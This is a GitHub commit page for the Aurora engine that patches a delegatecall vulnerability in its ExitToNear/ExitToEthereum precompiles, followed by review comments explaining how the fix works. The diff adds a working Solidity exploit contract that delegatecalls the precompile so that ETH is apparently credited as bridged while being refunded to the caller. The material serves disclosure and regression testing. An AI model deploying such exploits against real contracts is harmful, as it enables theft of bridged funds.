-
Notifications
You must be signed in to change notification settings - Fork 80
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
* Fix(precompile): ExitToNear ExitToEthereum vulnerability patch Fix vulnerability Include exploit contract * Release 2.5.3 notes * Update solidity version Co-authored-by: Michael Birch <michael.birch@aurora.dev>
- Loading branch information
1 parent
5c8691e
commit f95e32f
Showing
6 changed files
with
105 additions
and
6 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
2.5.2 | ||
2.5.3 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
// SPDX-License-Identifier: GPL-3.0 | ||
|
||
pragma solidity ^0.8.6; | ||
|
||
contract Exploit { | ||
address payable private owner; | ||
|
||
constructor() { | ||
owner = payable(msg.sender); | ||
} | ||
|
||
function exploit(bytes memory recipient) public payable { | ||
require(msg.sender == owner); | ||
|
||
bytes memory input = abi.encodePacked("\x00", recipient); | ||
uint input_size = 1 + recipient.length; | ||
|
||
assembly { | ||
let res := delegatecall(gas(), 0xe9217bc70b7ed1f598ddd3199e80b093fa71124f, add(input, 32), input_size, 0, 32) | ||
} | ||
|
||
owner.transfer(msg.value); | ||
} | ||
} | ||
|
f95e32f
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hi.
Can you explain how the check
context.address != Self::ADDRESS.raw()
can prevent delegate call?f95e32f
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for the question @Q5Ca
In the EVM, a delegate call executes the logic of the target contract in the present context (i.e. the current address and ETH value are unchanged). The logic in question here is part of a precompile with a statically known address (
Self::ADDRESS
; the.raw()
is just making the types line up and has no relevance to the high level logic). Therefore, the conditioncontext.address != Self::ADDRESS
catches delegate calls because, in the case of a delegate call, the EVM context will be the address of the caller rather thanSelf::ADDRESS
. If that condition is true then we immediately exit the precompile, preventing any of the precompile's important logic from being executed in the wrong context.f95e32f
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hi @birchmd
Thank you for the clear explaination. I got it.